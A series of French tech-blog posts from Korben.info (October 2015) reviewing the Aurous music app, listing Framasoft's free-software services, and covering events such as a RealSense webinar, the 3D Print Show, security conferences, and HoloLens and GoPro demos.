Aurous, le "Popcorn Time" de la musique dont toute la presse a parlé est enfin sorti. Et après avoir testé ce logiciel développé en Java, je dois dire que c'est plutôt décevant. L'application est moche, aucun visuel ou presque, une ergonomie à 2 centimes, pas mal de titres ou d'artistes qui n'existent pas et pour couronner le tout, il est totalement centralisé, car il ne repose pas sur le protocole Bitorrent, mais sur Pleer, un site russe qui streame de la musique et dont je vous ai déjà parlé. Snif... http://korben.info/wp-content/uploads/2015/10/aurous-alpha-screenshot-650x406.png Bref, si c'était pour faire ça, ça n'en valait pas la peine. Autant utiliser dans ce cas, des outils comme PMS ou directement le site Pleer.com. Ce truc n'a rien à voir, que ce soit de près ou de loin, avec Popcorn Time et comme les sources ne sont pas disponibles (en tout cas, je n’ai pas vu), ça va être difficile de corriger le tir. Dommage... Cet article merveilleux et sans aucun égal intitulé : Aurous – La déception ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Si vous êtes développeurs et que vous voulez commencer à developper pour les objets de réalité virtuelle, Intel organise le 14 octobre, un webinar basé sur des projets créés pour la caméra RealSense. Histoire de vous faire les crocs sur cette technologie, vous pourrez profiter de cours dispensés par 5 devs: Kfir Matza et Dolly Ovadia Nahon présenteront un karaoké interactif qui transforme les joueurs en rock-star en les immergeant totalement dans le décor de la chanson pendant toute la durée de leur performance.Anthony Thomas fera une démonstration de son installation innovante où il démultiplie les fonctionnalités de la caméra Intel RealSense en y connectant une board Arduino.Enfin, Rudy Aramayo utilisera Intel Realsense pour vous faire découvrir le monde de la physique quantique.Pour assister à ce webinar, vous pouvez vous inscrire ici Replay du précedent webinar: Cet article merveilleux et sans aucun égal intitulé : Augmentez vos compétences de développement sur les technologies de réalité virtuelle ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents. Voir l'article complet

Si vous vous intéressez un peu au logiciel libre, vous connaissez sans doute Framasoft. L'année dernière, ils avaient lancé un initiative baptisée Dégooglisons Internet qui avait pour but de sensibiliser la Gaule au problème de la centralisation de nos données chez les GAFAM (Google, Apple, Facebook, Amazon, Microsoft) mais aussi de donner les clés à tous ceux qui le désiraient pour utiliser ou mettre en place des solutions alternatives, libres et non centralisées. Pour cela, ils ont donc collecté des sous, ont adapté et mis en ligne des outils libres qui sont ouverts à tous et qui permettent surtout de montrer que c'est faisable et utilisable et que chacun peut aussi faire son propre Frama-chose-fork dans son coin. Je tire quand même mon chapeau aux techniciens qui ont bossé sur tout ça et qui vont maintenant devoir maintenir ces services avec les dons que feront les gens à l'association. Bon courage ! Durant cette première année, on a donc vu naitre : Framindmap basé sur Wisemapping pour vos mind mapping (organisation d'idées)Framadate basé sur Doodle qui permet de convenir d'un rendez-vous / réunionFramapad basé sur Etherpad Lite pour éditer des documents à plusieursFramanews basé sur TinyTinyRSS pour suivre vos flux RSSFramacalc basé sur Ethercalc pour éditer à plusieurs vos tableauxFramavectoriel basé sur SVG-Edit pour créer vos images vectoriellesFramasphère basé sur Diaspora pour remplacer FacebookFramabag basé sur Wallabag pour remplacer PocketFrama.link basé sur LSTU pour faire du raccourcissement d'URLFramadrive basé sur Owncloud pour faire de l'hébergement de fichiers (et remplacer Google Drive, Dropbox...etc)Framagit basé sur Gitlab et destiné à remplacer des hébergeurs de code comme GithubFramabookin basé sur BicBucStriim et destiné à remplacer les Google Books and coFramabee basé sur un Searx et qui permet de faire des recherches sur le webFramapic basé sur Lut.im qui permet d'héberger ses imagesFramabin basé sur Zerobin qui permet de partager des bouts de textes comme sur PastebinFramaboard basé sur Kanboard qui permet de faire de la gestion de projetsFramagames pour les joueurs qui aiment les petits jeux libresFramatube basé sur Mediagoblin pour partager des vidéos en lignehttp://korben.info/wp-content/uploads/2015/10/carte2015-animation-650x757.gifEt en projet à suivre, il y aura donc :Framapétition basé sur un Drupal avec WebForm pour lancer des pétitionsFramatalk basé sur Jitsi Meet qui vous permettra de discuter avec vos pôtesFramadrop qui sort ce vendredi, basé sur LUFI qui permet de faire de l'hébergement temporaire de fichiers comme WeTransferFramasites basé sur PluXML pour héberger votre site webFramagenda basé sur Webcalendar pour faire de l'agenda partagéFramacarte basé sur uMap pour remplacer les Google Maps and coFramaslides basé sur Strut.io pour faire des diaporamasFramameet basé sur WanaWana pour organiser des évémentsFramaloomio basé sur Loomio pour faire de la prise de décisionsFramaben basé sur WordPress pour remplacer Korben.info. Nan, je déconne !Framatweet basé sur Twister afin de remplacer tout ce qui est microblogging (Twitter)Frama-ON SAIT PAS ENCORE basé sur Scrumblr pour organiser ses idéesFrama-ON SAIT PAS NON PLUS basé sur WebODF ou PDFy pour faire du partage de PDF et remplacer des services comme ScribdFramapoulpe basé sur Pootle pour organiser de la traduction de logicielsFramanotes basé sur Laverna pour faire de la prise de note comme sur EvernoteFramamail basé sur Caliopen (si ça sort un jour) pour héberger vos emailsFramaforms basé sur Drupal avec WebForm pour créer des questionnaires / formulaires en ligneFramalistes basé sur Sympa pour faire de la liste de diffusionFrama-ON SAIT TOUJOURS PAS basé sur JsBin pour partager du code et le debugguer à plusieursJe vous invite à tester ces services, mais ce que vous invite encore plus à faire, c'est à télécharger les scripts dont vous avez besoin et que j'ai pris le temps de vous linker ci-dessus pour les héberger vous-même sur un petit serveur ou en local à la maison. http://korben.info/wp-content/uploads/2015/10/download-650x488.png + d'infos ici Voir l'article complet

En Octobre, les événements cool se succèdent, après les Assises de la sécurité où j'ai eu l'opportunité de rencontrer des génies en code et gestion des infrastructures, je vous propose aujourd'hui de découvrir le 3D print show, dédié aux technologies d'impressions 3D. L'impression 3D c'est un truc qui commence à me titiller depuis pas mal de temps, j'ai vu des créations assez bluffantes comme celles que proposent MyMiniFactory, qui avait fait gagner sur le blog le médaillon de The Witcher et d'un point de vu plus serious game, l'impression 3D prend vraiment de l'ampleur dans plusieurs domaines comme celui de la santé par exemple. Perso, je vous avoue que si je pouvais imprimer mes timbres tranquillou à la maison sans avoir besoin d'aller les chercher ça me ferait gagner un MAX de temps...c'était mon cri du coeur. A ceux qui s'intéressent à ces technologies d'impression 3D, j'ai 50 pass à vous faire gagner pour assister à cette nouvelle édition du 3D Print show qui aura lieu au Carrousel du Louvre les 16 et 17 octobre. http://korben.info/wp-content/uploads/2015/10/gbdf.pngSur place vous pourrez assister à des conférences-tables rondes sur l'avenir de la fabrication des objets, les changements opérés dans les processus de création et de design mais aussi plus spectaculaire, à des demos d'impressions d'objets les plus complexes, par notamment nos champions locaux Sculpteo et Dagoma par exemple. http://korben.info/wp-content/uploads/2015/10/gj.pngA voir également, l'équipe du pavillon Strakka Racing Car qui présentera l’impression 3D de pièces détachées à l’aide des plateformes industrielles 3D de Stratasys. Rêve fou, peut être qu'on arrêtera enfin t'entendre « ah b'hein désolé j'ai pas votre pièce de voiture , faut la commander» youhou ! Je vous prépare d'ailleurs un test de l'imprimante personnelle 3D de Dagoma, qui est open source technology au passage. Bref c'est plus de 50 exposants spécialisés en conception, numérisation et impression 3D qui seront présents, la liste complète des exposants est ici A mon avis, un bon moment de découverte techno à passer en perspective et pour avoir une chance d'y participer gratos voici le petit Kontest des familles: Et si le karma s'est retourné contre vous pour le jeu concours, vous pouvez acheter vos billets ici. Il paraît qu'une journée sans troller, c'est 10 points de karma en plus...mais j'ai pas encore essayé. Voir l'article complet

Hello tout le monde, Ce mois d'octobre est dédié à la sécurité informatique pour moi :-) Tout d'abord, je suis bien rentré des Assises de la Sécurité à Monaco et je dois dire que c'était intense. J'ai enchainé les confs, rencontré des gens passionnants, pas mal piétiné dans la zone réservée aux stands et je me suis vraiment régalé (non, je ne parle pas du buffet ;-)). Le public était essentiellement professionnel (RSSI, experts en sécurité...etc.) et je trouve que cet événement mériterait d'être plus connu. Du coup, je vous ai préparé plusieurs sujets en rapport avec la sécurité, mais je dois encore bosser dessus avant de pouvoir les sortir. Sinon, Monaco, c'était rigolo, mais putain je me suis ruiné en 3 secondes 12 :-) Autrement, hier j'ai eu le plaisir d'assister à une journée OZSSI organisée à Clermont-Ferrand par le correspondant régional de l'ANSSI et idem, mis à part 2 confs un peu trop "vente de soupe", le reste était vraiment passionnant. Je vous recommande de jeter un œil dans votre région pour voir si ce genre de journée existe. Bref, vous l'aurez compris, tout ça m'a inspiré et j'espère bientôt pouvoir en faire profiter ;-) Voilà pour les news ! Et vous ça roule ? Allez, bonne soirée, je retourne sur Hangout, y'a les mecs de NoLimitSecu qui m'ont invité dans leur podcast :-) K. Voir l'article complet

Lors de sa dernière conf, Microsoft a présenté une nouvelle démo d'HoloLens où voit les lunettes de réalité virtuelles utilisées pour jouer à un jeu vidéo. C'est très impressionnant filmé comme ça en vue extérieure, mais j'avoue que pour avoir testé ces HoloLens, j'ai un peu de mal à imaginer ce que ça va rendre en vrai quand on aura le casque sur le nez. En effet, comme je le disais dans mon précédent article sur le sujet, tout est parfait graphiquement avec les HoloLens SAUF la taille de la zone holographique qui risque de gâcher le plaisir à pas mal de monde. Pour vous donner un exemple à la louche, ça c'est ce qu'on voit quand on est à l'extérieur et que l'image est filmée par une caméra. http://korben.info/wp-content/uploads/2015/10/hololens-650x349.jpg Mais quand on a les lunettes sur le nez, voici à peu près, le champ de vision qu'on doit avoir. En gros si le joueur veut voir le second monstre sur le canapé, il devra vraiment baisser la tête. http://korben.info/wp-content/uploads/2015/10/holo2-650x349.jpg J'espère que Microsoft pourra rendre ça un peu plus immersif, car le sentiment que j'avais eu, c'était d'avoir un écran plat 70cm devant les yeux que je devais déplacer grâce aux mouvements de ma tête pour découvrir l'environnement virtuel qui m'entourait. En attendant, si vous avez les moyens, les premiers prototypes à destination des développeurs seront mis en vente début 2016 pour la modique somme de 3000 $. Pour ce prix-là , moi je partirai plutôt en vacances, je pense... Source Voir l'article complet

J'attends avec impatience la sortie du film Seul sur Mars ce 21 octobre, et en attendant, GoPro a mis en ligne une vidéo reprenant quelques extraits du film où sa petite caméra grand-angle est à l'honneur... On s'y croirait non ? Tellement qu'à 00m40 s on peut apercevoir que Matt Damon n'est finalement pas si seul que ça et qu'on peut très bien respirer sans casque à la surface de la planète rouge ;-) http://korben.info/wp-content/uploads/2015/10/the_martian-650x364.png http://korben.info/wp-content/uploads/2015/10/the_martianzoom.png Arf ! Source Voir l'article complet